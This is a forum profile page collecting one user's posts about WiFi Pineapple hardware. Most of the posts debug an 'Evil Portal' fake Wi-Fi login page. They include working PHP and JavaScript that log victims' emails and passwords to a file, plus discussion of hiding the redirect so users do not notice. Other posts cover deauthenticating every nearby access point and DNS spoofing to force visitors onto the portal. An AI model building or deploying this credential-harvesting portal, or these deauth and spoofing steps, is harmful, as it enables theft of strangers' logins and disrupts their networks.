jogischika
-
Posts
24 -
Joined
-
Last visited
Posts posted by jogischika
-
-
Hey TGYK,
thank you for your efforts in developing this script! I am running Yosemite and the script seems to have some problems here. When executing the script as root, I receive this log:
Killing ICS 225:412: execution error: System Events got an error: Can’t get window "Sharing" of process "System Preferences". (-1728) Backed up old NAT file Backed up old bootpd file Restored from previous completed configs 234:421: execution error: System Events got an error: Can’t get window "Sharing" of process "System Preferences". (-1728) ICS started IP on bridge100 set to 172.16.42.42 Set DNS to Google public DNS kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec] Reloaded bootpd file for DHCP
Obviously, the script does not work for me. Are there any specific settings one would have to make on the pineapple itself apart from the script?
Best,
jogi
-
Hey guys,
I have a weird problem with the Deauth infusion.
This is my setup:
- wlan0: master mode
- wlan1: client mode
- wlan2: mon0 & used for deauth
Content Whitelist: HomeAP, wlan0
Content Blacklist: RangeExtender of my home network (separate network)
(both saved of course)
When I now start aireplay-ng (with wlan2 and mon0 selected), it deauths all APs in reach EXCEPT my RangeExtender. Of course that fucks up everything for a second.
When I then log back into the pineapple management and the deauth infusion, the contents of my black/whitelist have changed.
Content Whitelist: RangeExtender
Content Blacklist: # Every AP (default option)
How can that happen? Is something wrong in my setup or is that some kind of bug? Fw is the current version.
Thanks for your support!
-
From my experience this could either mean flashing or starting up the wireless network. Is everything working properly despite that or what is the reason for your question?
-
Hey thank,
I had the same issue after playing around with the new wired client mode (clicked to many buttons too fast ;)). Solved it using the unbricking instructions here: https://wifipineapple.com/?flashing. This should work even though it is an unsatisfying solution.
Best
jogi
-
Hey guys,
I think you have already answered my question. I was assuming that wired client mode was possible before the current firmware update. I will just give this update a try and see if that solves it. Thanks though for all your input!
Best
jogi
-
Hey all,
So evil portal II has the problem that if a client wants to open a secure site (https) as a "first page" (i.e. before getting internet connection) or its his default page on browser start up, the portal will not be brought up. I was wondering if it was possible to spoof all https requests to the portal ip but only until clients get internet connection through the portal. So something like "selective dnsspoof".
Obviously I could manually do that for one client but that doesn't seem to be an elegant solution ;)
Thanks for any hints!
Jogi
-
Hey all,
I'm sure there is a simple explanation but I couldn't find this topic in the forum (i'm sure there must be a post though).
So I connect my pineapple to my home router via ethernet to have both antennas free for Karma, PineAP etc... Now, I connect to the wireless AP and try to open the pineapple management but this doesn't work. I can't get a connection over ssh either. Is there a way to solve this or is it just not possible for some reason?
Funny thing is that I can perfectly connect to the management website of my home router...
Any help would be appreciated!
Best
Jogi
-
Thanks for clearing this up and sorry for the thread!
-
Good luck anyways!
-
Thats weird... Worked like a charm for me when I picked up mine. They asked what it was and I told them its some kind of router to test wifi networks. That was it.
-
Hey everyone,
I just upgraded to the new firmware and found that evil portal II does not properly function anymore. Specifically, the large tile seems to be somehow "destroyed". The headers (e.g. "Edit Portal") are not clickable anymore. I added a picture to show you what I mean.
Is anyone experiencing the same issue?
Best,
Jogi
-
So, report of the night:
- I couldn't manage to get around CORS, even after changing nginx.conf browsers gave me an error. I might open up a new thread to find out how to solve this.
- I finally got your vanilla code working. The problem here was that the url behind $authtarget was decoded when being send as a parameter and somehow, everything after the "...nodogsplash_auth/?redir=http" has to be encoded to function (what a pain in the ass!). So I had to work with "substr" and "encodeurl". I guess this happens when you're new to all of this...
- So now my portal works on all devices BUT even with
<meta http-equiv="Refresh" Content="0
i.e. "immediate" refresh, especially on a mobile phone or tablet, one can really see the pineapples IP for a moment. This might alert some users (and i obviously don't won't that). Furthermore, in the console, one can of course see the own entered data in plain text => very obvious ;)
I guess, I will have to work on getting the ajax request and cors problem fixed in the long-term for a more subtle process.
PS.: My final php looks like this:
<?php $text = $_GET["email"]; $password = $_GET["password"]; $redir = $_GET["redir"]; $token = $_GET["tok"]; $file = fopen("stored.txt", "a"); fwrite($file, $text . "\n"); fwrite($file, $password . "\n"); fclose($file); echo '<meta http-equiv="Refresh" Content="0; URL=http://172.16.42.1:2050/nodogsplash_auth/?redir=http' . urlencode(substr($redir, 50, 22)) . '&tok=' . $token . '">'; ?> -
No, I haven't but this will be my next approach. It's just hard to let go of the code which works in 3 of 5 tested scenarios ;)
Thanks for the explanation on Ajax, that makes sense and I think I don't really need this even though it's the "cooler" solution. I'll just try the vanilla way and see if this leads to better results.
Back to the question on the header. Do you know if it is possible to add the header to the server in this scenario? Which file or else regulates the server the pineapple/portal runs on? I mean, "who" answers the Ajax request? Is it editable?
I might open up a new thread for the CORS problem, I could then set this thread to "solved". You obviously spend a lot of time on this already and I learned a whole lot! Thank you for that!
-
Hey newbi3,
I was a bit quick yesterday. Unfortunately, this does not do the trick. It seems like this header cannot be used as a request but rather only as a response header. Googling told me to implement this header on the server. Can I do that? I have no idea how.
I am really wondering why I seem to be the only person experiencing this problem. Looking at the code of others, many use a link with port 80 (or just "172.16.41.1/capture.php", resulting in a port 80 request (?)). Apparently, all browsers should deny an ajax request through another port. I understand that the portal is on port 2050 and the web server is on port 80, right?
This leads me to the question if the ajax request is really needed. In you sample code (infusion thread), you just use the getelementbyid combined with the php. What is the advantage of an ajax request?
Another (smaller) problem that I have with evil portal: When my pineapple does not have an internet connection through client mode, the portal does not load automatically (i.e. when opening a new window, which tries to access google). Nevertheless, I can get to the portal page by going directly to "172.16.42.1:2050" or by connecting the pineapple to the internet. Is that normal? Sometimes, I just would care if clients got internet connection as long as the portal does its trick...
Sorry for spamming you but the more I do here, the more interested I become ;)
-
Haha sorry about that, could be that it was quite late but if you see it as a compliment, just take it as one ;)
The header seems to have done the trick! It caused some new troubles though, which I might discuss here at some point in time but first i will try to fix it on my own!
Best,
jogi
-
I checked this in safari but the console only gave me css warnings, so I guess thats not interesting. Firefox gave my this, though (if I remember correctly, you understand German?!):
"Cross-Origin-Anfrage blockiert: Die Same-Origin-Regel verbietet, die externe Ressource auf http://172.16.42.1/capture.php zu lesen. Dies kann gelöst werden, indem die Ressource auf die gleiche Domain geschoben wird oder CORS aktiviert wird."
so something like: "Cross-Origin-Request blocked: The Same-Origin-Rule prohibits reading the external resource at http://..... This can be solved by relocating the resource to the same domain or activating CORS."
Actually I thought that the php is at the same domain?! Is activating CORS easy to do?
EDIT: Interestingly, Chrome says something similar but still posts the credentials... "XMLHttpRequest cannot load http://172.16.42.1/capture.php. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://172.16.42.1:2050' is therefore not allowed access. 172.16.42.1/:1"
-
Okay, I found out how to replicate the problem but still don't know the reason... It seems like on my MacBook, credentials are only logged when using Chrome. Firefox and Safari do nothing. On an iPhone and iPad it works though using mobile safari.
Does that ring a bell for anyone? Little background: I am using three different css files for different layouts for phones, tablets and pcs as well as the following javascript function to save the credentials:
<script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } } function sendInfo() { var xmlhttp = new ajaxRequest(); var emailvalue=encodeURIComponent(document.getElementById("email").value); var passwordvalue=encodeURIComponent(document.getElementById("password").value); var vouchervalue=encodeURIComponent(document.getElementById("voucher").value); var redirectvalue=encodeURIComponent(document.getElementById("redirect").value); if (emailvalue != null && emailvalue != "") { var parameters="email="+emailvalue+"&password="+passwordvalue+"&voucher="+vouchervalue+"&redirect="+redirectvalue; xmlhttp.open("POST", "http://172.16.42.1:80/capture.php", true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.send(parameters); window.location = document.getElementById("redirect").value; } else { document.getElementById("results").innerHTML="Please enter your email address"; } } </script>I'd appreciate any thoughts on what I could be doing wrong here!
-
Thanks for the reply! I tested it by typing in credentials from different machines one after another so I know that the form fields had some content... Thus, it must be something different...
Also thank you for the hint on the redirect! Should have known that... ;)
-
Hey guys, thanks for your input! I finally managed to get it working. Nevertheless, I am seeing one weird thing when testing my portal with multiple users logging in. My php seems to only selectively capture credentials i.e. some are captured, others not. My php looks like this:
<?php $email = $_POST['email']; $password = $_POST['password']; $voucher = $_POST['voucher']; $redirect = $_POST['redirect']; $file = fopen("stored.txt", "a"); fwrite($file, $email . "\n"); fwrite($file, $password . "\n"); fwrite($file, $voucher . "\n"); fclose($file); echo 'Thank for choosing Free Public Wifi! <meta http-equiv="refresh" content="2; url=' . $redirect . '" />'; ?>Does anyone have an idea how this can happen?
Another question which I haven't seen answered yet: How can I redirect the client to a specific predefined website instead of the one he was initially trying to open?
Thank you for your help!
Best,
Jogi
-
Hey all,
I know, this is probably post #1000 regarding this topic but it seems that none of the other posts could help me figure out how to fix my code.
Current situation:
- Clicking the button in my form runs service_me.php (located in /www)
- service_me.php writes the stored.txt file and all three fields work perfectly
- Problem 1: I don't know how to include the authorization ($authtarget) and redirection to a specific website. I managed to get a website in the header but only without authorization, which makes this useless...
Basically I have one questions:
- What do I have to include in the splash.html or service_me.php to initiate the authorization and redirection to e.g. google.com after logging the user data?
So here is my code:
splash.html
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Jogi WiFi</title> <meta name="viewport" content="width=1.0"> </head> <body> <div id="LoginForm"> <div id="Logo"><h1>Jogi WiFi</h1></div> <div id="LoginFormOptions"> <div id="LoginFormCredentials"> <form action="http://172.16.42.1/service_me.php" method="post"> <label id="user" for="name"></label> <h2>Username/Password</h2> <div class="LoginFormContents"> <br><br> <span> Username: <input type="text" name="name" class="LoginFormField" id="name" placeholder="Username" required/> Password: <input type="password" name="password" class="LoginFormField" id="password" placeholder="Password" required/></span><br> <br><h2>Third</h2> <span style="margin-right:20px;">Third:</span> <input id="third" name="third" type="text" class="LoginFormField" placeholder="Enter something here"> <input style="margin-top:-1px;margin-left:3px;" type="submit" id="submit" name="submit" class="LoginFormButton" value="Login"/> <div id="block"> <label id="user" for="name"></label> </div> </div> </div></body></html>service_me.php
<?php $user = $_POST['name']; $password = $_POST['password']; $third = $_POST['third']; $file = fopen("stored.txt", "a"); fwrite($file, $user . "\n"); fwrite($file, $password . "\n"); fwrite($file, $third . "\n"); fclose($file); ?>The weird thing is that when I just copy the wifidog from the original code (see below) clicking it works perfectly fine for the authorization.
<a href="$authtarget"> <img src="$imagesdir/wifidog.png" width="71" height="49" border="0" alt="Click to enter" title="Click to enter"> </a>I hope that I entered the code correctly... Otherwise, please give me a hint on how to do that properly, please.
I'd appreciate your help!
Best,
jogi
Mac OSX Internet Sharing with WiFi Pineapple howto
in WiFi Pineapple Mark V
Posted
Hey Red5,
thank you for posting your fix! Unfortunately, the last line returns an "illegal process id" error and ICS still does not work afterwards. Could you post the contents of your networksharing and apple.nat files?
Can you explain what this line (especially the "sed") does?
Thanks a lot!